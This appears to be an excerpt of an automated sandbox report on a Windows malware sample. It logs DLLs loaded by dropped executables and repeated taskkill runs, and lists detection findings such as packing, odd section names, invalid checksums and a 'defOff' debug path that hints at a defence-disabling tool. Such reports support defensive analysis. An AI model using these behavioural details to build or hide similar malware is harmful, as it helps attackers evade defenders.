Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: ieframe.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: mlang.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 1910272 > 1048576
Source: file.exe Static PE information: Raw size of ejhkawnv is bigger than: 0x100000 < 0x1a0a00
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: e5e907fecb.exe, 0000000F.00000002.3301652405.0000000005C62000.00000040.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.3201877381.0000000008050000.00000004.00001000.00020000.00000000.sdmp, 19cf1f0449.exe, 00000024.00000002.3049262928.0000000000D02000.00000040.00000001.01000000.00000015.sdmp, 19cf1f0449.exe, 00000024.00000003.2914185780.0000000005020000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.410000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ejhkawnv:EW;ogegxoql:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ejhkawnv:EW;ogegxoql:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 1.2.skotes.exe.c20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ejhkawnv:EW;ogegxoql:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ejhkawnv:EW;ogegxoql:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.c20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ejhkawnv:EW;ogegxoql:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ejhkawnv:EW;ogegxoql:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Unpacked PE file: 13.2.e5e907fecb.exe.410000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ygcbzohu:EW;dmyrahus:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ygcbzohu:EW;dmyrahus:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Unpacked PE file: 14.2.3996dc7402.exe.480000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jerbjqqv:EW;nuqdewfy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jerbjqqv:EW;nuqdewfy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Unpacked PE file: 15.2.e5e907fecb.exe.410000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ygcbzohu:EW;dmyrahus:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ygcbzohu:EW;dmyrahus:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Unpacked PE file: 33.2.3996dc7402.exe.480000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jerbjqqv:EW;nuqdewfy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jerbjqqv:EW;nuqdewfy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Unpacked PE file: 36.2.19cf1f0449.exe.d00000.0.unpack :EW;.rsrc:W;.idata :W;tcknjbhw:EW;pazbjnlm:EW;.taggant:EW; vs :ER;.rsrc:W;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: random[1].exe.6.dr Static PE information: real checksum: 0x436c61 should be: 0x434ca1
Source: 19cf1f0449.exe.6.dr Static PE information: real checksum: 0x2bcc45 should be: 0x2bc394
Source: random[1].exe1.6.dr Static PE information: real checksum: 0x1c2726 should be: 0x1c5cce
Source: r5mqFEC.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x85dfe
Source: a7f098a093.exe.6.dr Static PE information: real checksum: 0x436c61 should be: 0x434ca1
Source: 3996dc7402.exe.6.dr Static PE information: real checksum: 0x1c2726 should be: 0x1c5cce
Source: file.exe Static PE information: real checksum: 0x1d4955 should be: 0x1df0c5
Source: r5mqFEC[1].exe.6.dr Static PE information: real checksum: 0x0 should be: 0x85dfe
Source: skotes.exe.0.dr Static PE information: real checksum: 0x1d4955 should be: 0x1df0c5
Source: random[1].exe0.6.dr Static PE information: real checksum: 0x1cf8af should be: 0x1c7a81
Source: random[2].exe.6.dr Static PE information: real checksum: 0x2bcc45 should be: 0x2bc394
Source: e5e907fecb.exe.6.dr Static PE information: real checksum: 0x1cf8af should be: 0x1c7a81
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: ejhkawnv
